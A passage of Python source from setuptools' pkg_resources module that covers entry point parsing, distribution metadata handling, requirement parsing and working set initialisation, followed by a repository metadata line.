def fixup_namespace_packages(path_item, parent=None):
"""Ensure that previously-declared namespace packages include path_item"""
imp.acquire_lock()
try:
for package in _namespace_packages.get(parent,()):
subpath = _handle_ns(package, path_item)
if subpath:
fixup_namespace_packages(subpath, package)
finally:
imp.release_lock()
def file_ns_handler(importer, path_item, packageName, module):
"""Compute an ns-package subpath for a filesystem or zipfile importer"""
subpath = os.path.join(path_item, packageName.split('.')[-1])
normalized = _normalize_cached(subpath)
for item in module.__path__:
if _normalize_cached(item)==normalized:
break
else:
# Only return the path if it's not already there
return subpath
register_namespace_handler(pkgutil.ImpImporter, file_ns_handler)
register_namespace_handler(zipimport.zipimporter, file_ns_handler)
if importlib_bootstrap is not None:
register_namespace_handler(importlib_bootstrap.FileFinder, file_ns_handler)
def null_ns_handler(importer, path_item, packageName, module):
return None
register_namespace_handler(object, null_ns_handler)
def normalize_path(filename):
"""Normalize a file/dir name for comparison purposes"""
return os.path.normcase(os.path.realpath(filename))
def _normalize_cached(filename, _cache={}):
try:
return _cache[filename]
except KeyError:
_cache[filename] = result = normalize_path(filename)
return result
def _set_parent_ns(packageName):
parts = packageName.split('.')
name = parts.pop()
if parts:
parent = '.'.join(parts)
setattr(sys.modules[parent], name, sys.modules[packageName])
def yield_lines(strs):
"""Yield non-empty/non-comment lines of a string or sequence"""
if isinstance(strs, string_types):
for s in strs.splitlines():
s = s.strip()
# skip blank lines/comments
if s and not s.startswith('#'):
yield s
else:
for ss in strs:
for s in yield_lines(ss):
yield s
# whitespace and comment
LINE_END = re.compile(r"\s*(#.*)?$").match
# line continuation
CONTINUE = re.compile(r"\s*\\\s*(#.*)?$").match
# Distribution or extra
DISTRO = re.compile(r"\s*((\w|[-.])+)").match
# ver. info
VERSION = re.compile(r"\s*(<=?|>=?|===?|!=|~=)\s*((\w|[-.*_!+])+)").match
# comma between items
COMMA = re.compile(r"\s*,").match
OBRACKET = re.compile(r"\s*\[").match
CBRACKET = re.compile(r"\s*\]").match
MODULE = re.compile(r"\w+(\.\w+)*$").match
EGG_NAME = re.compile(
r"(?P<name>[^-]+)"
r"( -(?P<ver>[^-]+) (-py(?P<pyver>[^-]+) (-(?P<plat>.+))? )? )?",
re.VERBOSE | re.IGNORECASE
).match
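# Illustrative parse of an egg basename (extension already stripped):
#   EGG_NAME("FooBar-1.2-py2.7-linux_x86_64")
#   -> name='FooBar', ver='1.2', pyver='2.7', plat='linux_x86_64'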
class EntryPoint(object):
"""Object representing an advertised importable object"""
def __init__(self, name, module_name, attrs=(), extras=(), dist=None):
if not MODULE(module_name):
raise ValueError("Invalid module name", module_name)
self.name = name
self.module_name = module_name
self.attrs = tuple(attrs)
self.extras = Requirement.parse(("x[%s]" % ','.join(extras))).extras
self.dist = dist
def __str__(self):
s = "%s = %s" % (self.name, self.module_name)
if self.attrs:
s += ':' + '.'.join(self.attrs)
if self.extras:
s += ' [%s]' % ','.join(self.extras)
return s
def __repr__(self):
return "EntryPoint.parse(%r)" % str(self)
def load(self, require=True, env=None, installer=None):
if require:
self.require(env, installer)
else:
warnings.warn(
"`require` parameter is deprecated. Use "
"EntryPoint._load instead.",
DeprecationWarning,
)
return self._load()
def _load(self):
module = __import__(self.module_name, fromlist=['__name__'], level=0)
try:
return functools.reduce(getattr, self.attrs, module)
except AttributeError as exc:
raise ImportError(str(exc))
def require(self, env=None, installer=None):
if self.extras and not self.dist:
raise UnknownExtra("Can't require() without a distribution", self)
reqs = self.dist.requires(self.extras)
items = working_set.resolve(reqs, env, installer)
list(map(working_set.add, items))
pattern = re.compile(
r'\s*'
r'(?P<name>[+\w. -]+?)\s*'
r'=\s*'
r'(?P<module>[\w.]+)\s*'
r'(:\s*(?P<attr>[\w.]+))?\s*'
r'(?P<extras>\[.*\])?\s*$'
)
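# Illustrative lines accepted by this pattern:
#   "main = mypkg.cli:run"
#   "plugin = mypkg.ext:Factory.create [fast,tests]"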
@classmethod
def parse(cls, src, dist=None):
"""Parse a single entry point from string `src`
Entry point syntax follows the form::
name = some.module:some.attr [extra1, extra2]
The entry name and module name are required, but the ``:attrs`` and
``[extras]`` parts are optional
"""
m = cls.pattern.match(src)
if not m:
msg = "EntryPoint must be in 'name=module:attrs [extras]' format"
raise ValueError(msg, src)
res = m.groupdict()
extras = cls._parse_extras(res['extras'])
attrs = res['attr'].split('.') if res['attr'] else ()
return cls(res['name'], res['module'], attrs, extras, dist)
@classmethod
def _parse_extras(cls, extras_spec):
if not extras_spec:
return ()
req = Requirement.parse('x' + extras_spec)
if req.specs:
raise ValueError()
return req.extras
@classmethod
def parse_group(cls, group, lines, dist=None):
"""Parse an entry point group"""
if not MODULE(group):
raise ValueError("Invalid group name", group)
this = {}
for line in yield_lines(lines):
ep = cls.parse(line, dist)
if ep.name in this:
raise ValueError("Duplicate entry point", group, ep.name)
this[ep.name]=ep
return this
@classmethod
def parse_map(cls, data, dist=None):
"""Parse a map of entry point groups"""
if isinstance(data, dict):
data = data.items()
else:
data = split_sections(data)
maps = {}
for group, lines in data:
if group is None:
if not lines:
continue
raise ValueError("Entry points must be listed in groups")
group = group.strip()
if group in maps:
raise ValueError("Duplicate group name", group)
maps[group] = cls.parse_group(group, lines, dist)
return maps
def _remove_md5_fragment(location):
if not location:
return ''
parsed = urlparse(location)
if parsed[-1].startswith('md5='):
return urlunparse(parsed[:-1] + ('',))
return location
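# e.g. 'http://host/Pkg-1.0.egg#md5=abcd' -> 'http://host/Pkg-1.0.egg';
# locations without an '#md5=' fragment are returned unchanged.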
class Distribution(object):
"""Wrap an actual or potential sys.path entry w/metadata"""
PKG_INFO = 'PKG-INFO'
def __init__(self, location=None, metadata=None, project_name=None,
version=None, py_version=PY_MAJOR, platform=None,
precedence=EGG_DIST):
self.project_name = safe_name(project_name or 'Unknown')
if version is not None:
self._version = safe_version(version)
self.py_version = py_version
self.platform = platform
self.location = location
self.precedence = precedence
self._provider = metadata or empty_provider
@classmethod
def from_location(cls, location, basename, metadata=None,**kw):
project_name, version, py_version, platform = [None]*4
basename, ext = os.path.splitext(basename)
if ext.lower() in _distributionImpl:
# .dist-info gets much metadata differently
match = EGG_NAME(basename)
if match:
project_name, version, py_version, platform = match.group(
'name','ver','pyver','plat'
)
cls = _distributionImpl[ext.lower()]
return cls(
location, metadata, project_name=project_name, version=version,
py_version=py_version, platform=platform, **kw
)
@property
def hashcmp(self):
return (
self.parsed_version,
self.precedence,
self.key,
_remove_md5_fragment(self.location),
self.py_version,
self.platform,
)
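# Ordering compares parsed version first, then precedence, key, location
# (minus any '#md5=' fragment), Python version, and platform.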
def __hash__(self):
return hash(self.hashcmp)
def __lt__(self, other):
return self.hashcmp < other.hashcmp
def __le__(self, other):
return self.hashcmp <= other.hashcmp
def __gt__(self, other):
return self.hashcmp > other.hashcmp
def __ge__(self, other):
return self.hashcmp >= other.hashcmp
def __eq__(self, other):
if not isinstance(other, self.__class__):
# It's not a Distribution, so they are not equal
return False
return self.hashcmp == other.hashcmp
def __ne__(self, other):
return not self == other
# These properties have to be lazy so that we don't have to load any
# metadata until/unless it's actually needed. (i.e., some distributions
# may not know their name or version without loading PKG-INFO)
@property
def key(self):
try:
return self._key
except AttributeError:
self._key = key = self.project_name.lower()
return key
@property
def parsed_version(self):
if not hasattr(self, "_parsed_version"):
self._parsed_version = parse_version(self.version)
if isinstance(
self._parsed_version, packaging.version.LegacyVersion):
# While an empty version is technically a legacy version and
# is not a valid PEP 440 version, it's also unlikely to
# actually come from someone and instead it is more likely that
# it comes from setuptools attempting to parse a filename and
# including it in the list. So for that we'll gate this warning
# on if the version is anything at all or not.
if self.version:
warnings.warn(
"'%s (%s)' is being parsed as a legacy, non PEP 440, "
"version. You may find odd behavior and sort order. "
"In particular it will be sorted as less than 0.0. It "
"is recommend to migrate to PEP 440 compatible "
"versions." % (
self.project_name, self.version,
),
PEP440Warning,
)
return self._parsed_version
@property
def version(self):
try:
return self._version
except AttributeError:
for line in self._get_metadata(self.PKG_INFO):
if line.lower().startswith('version:'):
self._version = safe_version(line.split(':',1)[1].strip())
return self._version
else:
tmpl = "Missing 'Version:' header and/or %s file"
raise ValueError(tmpl % self.PKG_INFO, self)
@property
def _dep_map(self):
try:
return self.__dep_map
except AttributeError:
dm = self.__dep_map = {None: []}
for name in 'requires.txt', 'depends.txt':
for extra, reqs in split_sections(self._get_metadata(name)):
if extra:
if ':' in extra:
extra, marker = extra.split(':', 1)
if invalid_marker(marker):
# XXX warn
reqs=[]
elif not evaluate_marker(marker):
reqs=[]
extra = safe_extra(extra) or None
dm.setdefault(extra,[]).extend(parse_requirements(reqs))
return dm
def requires(self, extras=()):
"""List of Requirements needed for this distro if `extras` are used"""
dm = self._dep_map
deps = []
deps.extend(dm.get(None, ()))
for ext in extras:
try:
deps.extend(dm[safe_extra(ext)])
except KeyError:
raise UnknownExtra(
"%s has no such extra feature %r" % (self, ext)
)
return deps
def _get_metadata(self, name):
if self.has_metadata(name):
for line in self.get_metadata_lines(name):
yield line
def activate(self, path=None):
"""Ensure distribution is importable on `path` (default=sys.path)"""
if path is None:
path = sys.path
self.insert_on(path)
if path is sys.path:
fixup_namespace_packages(self.location)
for pkg in self._get_metadata('namespace_packages.txt'):
if pkg in sys.modules:
declare_namespace(pkg)
def egg_name(self):
"""Return what this distribution's standard .egg filename should be"""
filename = "%s-%s-py%s" % (
to_filename(self.project_name), to_filename(self.version),
self.py_version or PY_MAJOR
)
if self.platform:
filename += '-' + self.platform
return filename
def __repr__(self):
if self.location:
return "%s (%s)" % (self, self.location)
else:
return str(self)
def __str__(self):
try:
version = getattr(self, 'version', None)
except ValueError:
version = None
version = version or "[unknown version]"
return "%s %s" % (self.project_name, version)
def __getattr__(self, attr):
"""Delegate all unrecognized public attributes to .metadata provider"""
if attr.startswith('_'):
raise AttributeError(attr)
return getattr(self._provider, attr)
@classmethod
def from_filename(cls, filename, metadata=None, **kw):
return cls.from_location(
_normalize_cached(filename), os.path.basename(filename), metadata,
**kw
)
def as_requirement(self):
"""Return a ``Requirement`` that matches this distribution exactly"""
if isinstance(self.parsed_version, packaging.version.Version):
spec = "%s==%s" % (self.project_name, self.parsed_version)
else:
spec = "%s===%s" % (self.project_name, self.parsed_version)
return Requirement.parse(spec)
def load_entry_point(self, group, name):
"""Return the `name` entry point of `group` or raise ImportError"""
ep = self.get_entry_info(group, name)
if ep is None:
raise ImportError("Entry point %r not found" % ((group, name),))
return ep.load()
def get_entry_map(self, group=None):
"""Return the entry point map for `group`, or the full entry map"""
try:
ep_map = self._ep_map
except AttributeError:
ep_map = self._ep_map = EntryPoint.parse_map(
self._get_metadata('entry_points.txt'), self
)
if group is not None:
return ep_map.get(group,{})
return ep_map
def get_entry_info(self, group, name):
"""Return the EntryPoint object for `group`+`name`, or ``None``"""
return self.get_entry_map(group).get(name)
def insert_on(self, path, loc = None):
"""Insert self.location in path before its nearest parent directory"""
loc = loc or self.location
if not loc:
return
nloc = _normalize_cached(loc)
bdir = os.path.dirname(nloc)
npath= [(p and _normalize_cached(p) or p) for p in path]
for p, item in enumerate(npath):
if item == nloc:
break
elif item == bdir and self.precedence == EGG_DIST:
# if it's an .egg, give it precedence over its directory
if path is sys.path:
self.check_version_conflict()
path.insert(p, loc)
npath.insert(p, nloc)
break
else:
if path is sys.path:
self.check_version_conflict()
path.append(loc)
return
# p is the spot where we found or inserted loc; now remove duplicates
while True:
try:
np = npath.index(nloc, p+1)
except ValueError:
break
else:
del npath[np], path[np]
# ha!
p = np
return
def check_version_conflict(self):
if self.key == 'setuptools':
# ignore the inevitable setuptools self-conflicts :(
return
nsp = dict.fromkeys(self._get_metadata('namespace_packages.txt'))
loc = normalize_path(self.location)
for modname in self._get_metadata('top_level.txt'):
if (modname not in sys.modules or modname in nsp
or modname in _namespace_packages):
continue
if modname in ('pkg_resources', 'setuptools', 'site'):
continue
fn = getattr(sys.modules[modname], '__file__', None)
if fn and (normalize_path(fn).startswith(loc) or
fn.startswith(self.location)):
continue
issue_warning(
"Module %s was already imported from %s, but %s is being added"
" to sys.path" % (modname, fn, self.location),
)
def has_version(self):
try:
self.version
except ValueError:
issue_warning("Unbuilt egg for " + repr(self))
return False
return True
def clone(self,**kw):
"""Copy this distribution, substituting in any changed keyword args"""
names = 'project_name version py_version platform location precedence'
for attr in names.split():
kw.setdefault(attr, getattr(self, attr, None))
kw.setdefault('metadata', self._provider)
return self.__class__(**kw)
@property
def extras(self):
return [dep for dep in self._dep_map if dep]
class DistInfoDistribution(Distribution):
"""Wrap an actual or potential sys.path entry w/metadata, .dist-info style"""
PKG_INFO = 'METADATA'
EQEQ = re.compile(r"([\(,])\s*(\d.*?)\s*([,\)])")
@property
def _parsed_pkg_info(self):
"""Parse and cache metadata"""
try:
return self._pkg_info
except AttributeError:
metadata = self.get_metadata(self.PKG_INFO)
self._pkg_info = email.parser.Parser().parsestr(metadata)
return self._pkg_info
@property
def _dep_map(self):
try:
return self.__dep_map
except AttributeError:
self.__dep_map = self._compute_dependencies()
return self.__dep_map
def _preparse_requirement(self, requires_dist):
"""Convert 'Foobar (1); baz' to ('Foobar ==1', 'baz')
Split environment marker, add == prefix to version specifiers as
necessary, and remove parentheses.
"""
parts = requires_dist.split(';', 1) + ['']
distvers = parts[0].strip()
mark = parts[1].strip()
distvers = re.sub(self.EQEQ, r"\1==\2\3", distvers)
distvers = distvers.replace('(', '').replace(')', '')
return (distvers, mark)
def _compute_dependencies(self):
"""Recompute this distribution's dependencies."""
from _markerlib import compile as compile_marker
dm = self.__dep_map = {None: []}
reqs = []
# Including any condition expressions
for req in self._parsed_pkg_info.get_all('Requires-Dist') or []:
distvers, mark = self._preparse_requirement(req)
parsed = next(parse_requirements(distvers))
parsed.marker_fn = compile_marker(mark)
reqs.append(parsed)
def reqs_for_extra(extra):
for req in reqs:
if req.marker_fn(override={'extra':extra}):
yield req
common = frozenset(reqs_for_extra(None))
dm[None].extend(common)
for extra in self._parsed_pkg_info.get_all('Provides-Extra') or []:
extra = safe_extra(extra.strip())
dm[extra] = list(frozenset(reqs_for_extra(extra)) - common)
return dm
_distributionImpl = {
'.egg': Distribution,
'.egg-info': Distribution,
'.dist-info': DistInfoDistribution,
}
def issue_warning(*args,**kw):
level = 1
g = globals()
try:
# find the first stack frame that is *not* code in
# the pkg_resources module, to use for the warning
while sys._getframe(level).f_globals is g:
level += 1
except ValueError:
pass
warnings.warn(stacklevel=level + 1, *args, **kw)
def parse_requirements(strs):
"""Yield ``Requirement`` objects for each specification in `strs`
`strs` must be a string, or a (possibly-nested) iterable thereof.
"""
# create a steppable iterator, so we can handle \-continuations
lines = iter(yield_lines(strs))
def scan_list(ITEM, TERMINATOR, line, p, groups, item_name):
items = []
while not TERMINATOR(line, p):
if CONTINUE(line, p):
try:
line = next(lines)
p = 0
except StopIteration:
raise ValueError(
"\\ must not appear on the last nonblank line"
)
match = ITEM(line, p)
if not match:
msg = "Expected " + item_name + " in"
raise ValueError(msg, line, "at", line[p:])
items.append(match.group(*groups))
p = match.end()
match = COMMA(line, p)
if match:
# skip the comma
p = match.end()
elif not TERMINATOR(line, p):
msg = "Expected ',' or end-of-list in"
raise ValueError(msg, line, "at", line[p:])
match = TERMINATOR(line, p)
# skip the terminator, if any
if match:
p = match.end()
return line, p, items
for line in lines:
match = DISTRO(line)
if not match:
raise ValueError("Missing distribution spec", line)
project_name = match.group(1)
p = match.end()
extras = []
match = OBRACKET(line, p)
if match:
p = match.end()
line, p, extras = scan_list(
DISTRO, CBRACKET, line, p, (1,), "'extra' name"
)
line, p, specs = scan_list(VERSION, LINE_END, line, p, (1, 2),
"version spec")
specs = [(op, val) for op, val in specs]
yield Requirement(project_name, specs, extras)
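# Illustrative use:
#   for req in parse_requirements("foo>=1.0,<2.0\nbar[extra]"):
#       ...  # yields Requirement objects for 'foo' and 'bar'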
class Requirement:
def __init__(self, project_name, specs, extras):
"""DO NOT CALL THIS UNDOCUMENTED METHOD; use Requirement.parse()!"""
self.unsafe_name, project_name = project_name, safe_name(project_name)
self.project_name, self.key = project_name, project_name.lower()
self.specifier = packaging.specifiers.SpecifierSet(
",".join(["".join([x, y]) for x, y in specs])
)
self.specs = specs
self.extras = tuple(map(safe_extra, extras))
self.hashCmp = (
self.key,
self.specifier,
frozenset(self.extras),
)
self.__hash = hash(self.hashCmp)
def __str__(self):
extras = ','.join(self.extras)
if extras:
extras = '[%s]' % extras
return '%s%s%s' % (self.project_name, extras, self.specifier)
def __eq__(self, other):
return (
isinstance(other, Requirement) and
self.hashCmp == other.hashCmp
)
def __contains__(self, item):
if isinstance(item, Distribution):
if item.key != self.key:
return False
item = item.version
# Allow prereleases always in order to match the previous behavior of
# this method. In the future this should be smarter and follow PEP 440
# more accurately.
return self.specifier.contains(item, prereleases=True)
def __hash__(self):
return self.__hash
def __repr__(self): return "Requirement.parse(%r)" % str(self)
@staticmethod
def parse(s):
reqs = list(parse_requirements(s))
if reqs:
if len(reqs) == 1:
return reqs[0]
raise ValueError("Expected only one requirement", s)
raise ValueError("No requirements found", s)
def _get_mro(cls):
"""Get an mro for a type or classic class"""
if not isinstance(cls, type):
class cls(cls, object): pass
return cls.__mro__[1:]
return cls.__mro__
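# Classic (old-style) classes lack __mro__, so a temporary new-style
# subclass is created and its MRO, minus the shim itself, is used instead.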
def _find_adapter(registry, ob):
"""Return an adapter factory for `ob` from `registry`"""
for t in _get_mro(getattr(ob, '__class__', type(ob))):
if t in registry:
return registry[t]
def ensure_directory(path):
"""Ensure that the parent directory of `path` exists"""
dirname = os.path.dirname(path)
if not os.path.isdir(dirname):
os.makedirs(dirname)
def _bypass_ensure_directory(path, mode=0o777):
"""Sandbox-bypassing version of ensure_directory()"""
if not WRITE_SUPPORT:
raise IOError('"os.mkdir" not supported on this platform.')
dirname, filename = split(path)
if dirname and filename and not isdir(dirname):
_bypass_ensure_directory(dirname)
mkdir(dirname, mode)
def split_sections(s):
"""Split a string or iterable thereof into (section, content) pairs
Each ``section`` is a stripped version of the section header ("[section]")
and each ``content`` is a list of stripped lines excluding blank lines and
comment-only lines. If there are any such lines before the first section
header, they're returned in a first ``section`` of ``None``.
"""
section = None
content = []
for line in yield_lines(s):
if line.startswith("["):
if line.endswith("]"):
if section or content:
yield section, content
section = line[1:-1].strip()
content = []
else:
raise ValueError("Invalid section heading", line)
else:
content.append(line)
# wrap up last segment
yield section, content
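# Illustrative use:
#   list(split_sections("a\n[sec]\nb")) == [(None, ['a']), ('sec', ['b'])]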
def _mkstemp(*args,**kw):
old_open = os.open
try:
# temporarily bypass sandboxing
os.open = os_open
return tempfile.mkstemp(*args,**kw)
finally:
# and then put it back
os.open = old_open
# Silence the PEP440Warning by default, so that end users don't get hit by it
# randomly just because they use pkg_resources. We want to append the rule
# because we want earlier uses of filterwarnings to take precedence over this
# one.
warnings.filterwarnings("ignore", category=PEP440Warning, append=True)
# Set up global resource manager (deliberately not state-saved)
_manager = ResourceManager()
def _initialize(g):
for name in dir(_manager):
if not name.startswith('_'):
g[name] = getattr(_manager, name)
_initialize(globals())
# Prepare the master working set and make the ``require()`` API available
working_set = WorkingSet._build_master()
_declare_state('object', working_set=working_set)
require = working_set.require
iter_entry_points = working_set.iter_entry_points
add_activation_listener = working_set.subscribe
run_script = working_set.run_script
# backward compatibility
run_main = run_script
# Activate all distributions already on sys.path, and ensure that
# all distributions added to the working set in the future (e.g. by
# calling ``require()``) will get activated as well.
add_activation_listener(lambda dist: dist.activate())
working_set.entries=[]
# match order
list(map(working_set.add_entry, sys.path))
| apache-2.0 | 7,487,369,823,120,158,000 | 33.822111 | 82 | 0.592867 | false |